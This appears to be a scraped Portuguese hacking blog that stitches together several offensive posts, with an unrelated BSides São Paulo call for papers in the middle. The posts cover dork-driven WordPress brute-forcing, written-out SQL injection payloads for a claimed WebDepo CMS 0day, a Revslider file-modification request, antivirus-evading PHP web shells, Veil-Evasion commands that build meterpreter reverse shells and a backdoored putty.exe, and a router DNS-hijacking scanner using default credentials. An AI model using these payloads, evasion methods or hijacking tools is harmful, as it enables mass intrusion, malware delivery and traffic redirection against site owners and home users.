Advanced Search, Applied through dorks ("set of search operators."), Capture sensitive information, failures in servers. Group aimed at advanced filters to search engines & Digital Security Research.
Eae galera, esses dias eu estava pesquisando algumas falhas em wordpress, então tive uma ideia de montar um script que realiza-se um bruteforce em wordpress's, Só que antes ele cata-se os sites com cms (Wordpress) e salva-se em um .txt.
Pensei em fazer essa etapa de dorking na mão, mas pra quer ter esse trabalho todo quando se pode se utilizar o nosso scaner Inurlbr <3 com as dorks já definidas. Depois de catar as url na etapa de dorking com Inurlbr, Montei o script que verifica se aquela url trabalha ou não com Wordpress, caso não trabalhar ele te print na tela "Not is wordpress" caso contrario ele realizará o bruteforce com senhas padrões contidas dentro do código. No script tem poucas senhas mas você pode incrementar mas senhas ou se você tiver um pequeno conhecimento em python você pode colocar o script para carregar um wordlist.txt.
A etapa de dorking você pode escolher em fazer manualmente ou deixar o script fazer por você, na execução ele ira te perguntar; Dorking use to find sites using the inurlbr? [Y][N].
EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL
Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha defile_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!
A "Conferência O Outro Lado Security BSides São Paulo" (Co0L BSidesSP) é uma mini-conferência gratuita organizada por profissionais envolvidos com o mercado de segurança da informação. O principal objetivo da Co0L BSidesSP é o de permitir a inovação, discussão e a troca de conhecimento sobre segurança da informação e cultura hacker, em um clima descontraído e dentro de uma abordagem aonde estas disciplinas se complementam.
A Co0L BSidesSP faz parte das conferências “Security BSides” (www.securitybsides.com) existentes em vários países, com propósito de fomentar a comunidade local de segurança e que acontecem em conjunto com algum grande evento da área.
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.
As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:
- Data final para submissão de palestras e oficinas: 20/04
Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css.
Enviando a requisição:
Via post com seguintes campos: array(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "_YOU_HTML_ADD_"
);
Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte
Script php shell de exploração utilizando function nativos do PHP e tentando melhorar a dinâmica e forma de uso do script.
Para executar comandos em um servidor em sua SHELL podemos usar as seguintes functions nativas:
shell_exec - Executa um comando via shell e retorna a saída inteira como uma string.
system - Executa um programa externo e mostra a saída.
exec - Executa um programa externo.
passthru - Executa um programa externo e mostra a saída crúa.
Com o grande numero de scanners/aplicações de segurança que tem o objetivo procurar arquivos maliciosas em seus servidores, muitos estão optando por usar um script simples para escapar dos famigerados AV's ("nada é 100% juntando isso com ofuscação de código você tem mais invisibilidade ").
Tais scripts tem o objetivo de manter o acesso do atacante, logo abaixo temos 3 modelos de script php que nem um mostra nome de functions nativas php, script pequeno e objetivo.
OBS: Os 3 script exemplos foram anexados a um arquivo par gerar tal output.
OFUSCANDO SEU CÓDIGO:
No desenvolvimento de software, a ofuscação é o ato deliberado de criação de código ofuscado, ou seja, de origem ou código de máquina que é difícil para o ser humano de entender. Como ofuscação em linguagem natural, pode usar expressões desnecessariamente rotunda para compor declarações.
Os programadores podem deliberadamente ofuscar código para esconder a sua finalidade (segurança pela obscuridade) ou a sua lógica, a fim de evitar a violação, impedir a engenharia reversa, ou como um quebra-cabeça ou desafio de lazer para alguém que lê o código fonte.
Programas conhecidos como obfuscators transformar código legível em código ofuscado usando várias técnicas. Serviço online FOPO:
Veil-framework é uma coleção de ferramentas de segurança (red team) que implementam varios metodos de ataque, com foco
em burlar a detecçao dos anti-virus e'Veil' é o super projecto para os lançamentos (stable) das ferramentas da veil-framework.
a framework é desenvolvida por: @Harmj0y, @ChrisTruncer, @TheMightyShiv.
E contem actualmente os seguintes modulos: Veil-Evasion: uma ferramenta para gerar payloads indetectaveis (FUD) usando uma variedade de tecnicas e linguagens. Veil-Catapult: um systema de entrega de payloads ao estilo do psexec (smb) Veil-Pillage: uma ferramenta de pós-exploraçao modular (depois do alvo ser explorado) Veil-PowerTools: projectos powershell com foco em operaçoes ofencivas Veil-Ordnance: uma ferramenta para gerar shellcode e obfusca-lo usando 2 'encoders' escritos especialmente para este modulo.
Como a framework é dividida em diferentes modulos seria dificil neste artigo me referir a todos eles, por isso vamos nos focar em descrever o modulo 'veil-Evasion' ( framework interface + command line syntax + cobalt strike 'cortana integration' ) que consiste na criação de payloads indetectaveis, deixando para outro artigo a descrição dos restantes modulos (veil-Catapult | Veil-Pillage | Veil-powerTools).
Veil-Evasion
A ferramenta de AV-evasão, escrita por Chris truncer chamada 'Veil-Evasion'propõe uma protecção eficaz contra a detecção de exploits autonomos, veil-evasion agrega varias tecnicas de injeção de shellcode em uma estrutura que simplifica o gerenciamento. Como framework Veil-Evasion possui varios recursos e inclui o seguinte:
1 - incorpora shellcode em uma variedade de linguagens de programaçao incluindo C, C#, Ruby, python
2 - pode integrar ferramentas externas como Hyperion (criptografia arquivo EXE com AES-128 bit) PEScrambler (obfuscate win32 binaries) e backdoor_factory (patch executaveis com shellcode e continuar a execução normal do estado anterior ao prepatched state)
3 - a sua funcionalidade pode ser 'scripted' para automatizar a implementação (command line syntax)
4 - payloads em python podem ser obfuscados/compilados em exe usando PyInstaller, Pwnstaller, Py2Exe. 5 - Veil-Evasion pode ser integrado no cobalt strike atravez da utilizaçao de um 'script cortana' (veil_evasion.cna) by Harmj0y.
Uma vez que um exploit foi criado, o tester deve verificar o payload contra o VirusTotal para garantir que ele não vai disparar um alerta quando é colocado no systema de destino, se a amostra é submetida directamente ao VirusTotal e é bandeirada (flag) de comportamento como software malicioso, em seguida uma actualização de assinatura contra a apresentação pode ser libertada por antivirus (AV) fornecedores em menos de 1 hora, é por isso que os usuarios são advertidos com a mensagem: "não enviar amostras para qualquer scanner online"
Veil-Evasion permite os testers de usar um check seguro contra VirusTotal. quando qualquer payload é gerado, um hash (SHA1) é criado e adicionado ao hashs.txt localizado no directorio do Veil-Framework (/usr/share/Veil-Evasion/hashs.txt), testers podem chamar o script 'checkvt'para apresentar os hashes para o VirusTotal, que irá verificar os valores de hash SHA1 contra a sua base de dados de mallware. se um payload Veil-Evasion desencadeia uma correspondencia, então o tester sabe que pode ser detectado pelo systema de destino. O 'checkvt' apresenta um resultado positivo (mallware) se 1 dos 44 AV's usados pelo Virus-Total o descobrir, (querendo dizer que ele pode ser considerado mallware só pelo AVG e mesmo assim a SHA1 ver flagged como mallware).
A equipe Veil-Evasion está começando algo que estamos chamando de "V-Day", para a vitória sobre a detecçao por parte dos AntiVírus. No dia 15 de cada mês pelo menos um novo módulo de carga útil (payload) será liberado.
'c/meterpreter/rev_tcp' compiled to exe (command line syntax)
A framework tambem vem equipada de uma 'command line syntax' que pode ser usada para incorporar o Veil-Evasion nos nossos propios projectos paralelos, e pode ser acedida com o command './Veil-Evasion.py -h' tambem nos podemos usar da 'syntax' da ferramenta para criar o mesmo payload (c/meterpreter/rev_tcp) sem precisarmos de entrar na toolkit. Building payloads (command line syntax): ./Veil-Evasion.py -p c/meterpreter/rev_tcp -c LHOST=192.168.1.68 LPORT=666 compile_to_exe=y -o inurlTuto ./Veil-Evasion.py -p auxiliary/coldwar_wrapper -c original_exe=/home/pedro/putty.exe -o putty-backdoored ./Veil-Evasion.py -p ruby/meterpreter/rev_tcp -c LHOST=192.168.1.68 LPORT=666 compile_to_exe=y -o rubypayload-to-exe
Files de configuração da tookit podem ser encontrados em '/etc/veil/settings.py' epermite-nos configurar 'internal settings' como:
1 - Path to output the source of payloads 2 - Path to output compiled payloads
3 - Whether to generate a msf handler script and where to place it
4 - The path to pyinstaller for example: /opt/pyinstaller-2.0/
Cortana é uma linguagem de scripting de ataque baseada em 'sleep' ambos escritos por raphael mudge,
cortana permite a manipulaçao avançada de armitage ou cobalt strike. Harmj0y construiu um script (.cna) para intregar o Veil-Evasion directamente no armitage ou cobalt strike usando 'cortana scripting', para carrega-lo basta seleccionar 'script' -> load e navegar ate ao 'veil_evasion.cna' script para intergrar o Veil-Evasion directamenta nas frameworks armitage ou cobalt strike.
na primeira execuçao voce sera solicitado a introduzir o path de instalaçao da Veil-Evasion, depois de carregar o script cortana, um menu Veil-Evasion sera aberto na barra superior (cobalt strike), clicando sobre ele abre o 'Veil-Evasion' menu que ira permitir que voce gere uma carga util (payload). "em armitage teremos que loadar o script cortana em: armitage -> scripts -> load"
original article: https://www.veil-framework.com/veil-evasion-cortana-integration/
Ah um tempo atrás eu estava pesquisando alguns router(roteadores) vulneráveis a diversos tipos de ataques mas comuns, Durante a pesquisa encontrei 10 routers com senhas padrões em apenas um range de ip do modelo DSLink 260E,Todos com senhas padrões e com (forms) para alteração de DNS, Em 10 routers obtive sucesso realizando alteração de DNS.
Então desenvolvi um mini scanner em python, que realiza um pequeno bruteforce com usuários e senhas padrões definidos dentro do código e depois de encontrado usuário e senha ele envia um request get realizando a alteração dos DNS.
Execução:
root@jh00n:~/Desktop/codes# python xpl.py <IP>
[Aqui você será definido o ip do roteador]
Retorno:
[ + ] DNS changed sucess in: 127.0.0.1 | user@password
Em caso de sucesso o return "DNS changed sucess in: IP | user@password"
DORK de pesquisa: Dork Google 1: inurl:/com_simplephotogallery site:com Dork Google 2: inurl:/com_simplephotogallery site:org Dork Google 3: inurl:/com_simplephotogallery site:fr Dork Google 4: inurl:/com_simplephotogallery/
Agora vamos organizar nosso comando INURLBR para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.
--dork Defines which dork the search engine will use.
Example: --dork {dork}
Usage: --dork 'site:.gov.br inurl:php? id'
- Using multiples dorks:
Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
mini exploits defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo. A não ser que queira toda vez digitar sempre os mesmos parâmetros.
Criaremos um mini exploit que vamos usar junto ao SCANNER INURLBR, mas antes você deve entender os parâmetros especiais do scanner INURLBR que usaremos.
_TARGET_ é um parâmetro especial que passando para que seja substituído pelo domínio do nosso alvo.
_TARGETFULL_ é um parâmetro especial que passando para que seja substituído pela URL inteira do nosso alvo.
O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.
Descrição Técnica:
A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.
order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.
Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.
![[ Inurlbr dorking + Wordpress brute forcing ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpAgT9vlbHNfCC5axAITOhmtlz1OE9IrHsmdcAyewl2n1PLd1XcIFZg1hzVk-vka52wpom1PhnEMz24DmPjy6SivHBkA8Lj3BCQGxcKfUTFZu08-d1ezhezqYP7VT1_syT5xZV8jUMPMw/s1600/found.png "[ Inurlbr dorking + Wordpress brute forcing ]")
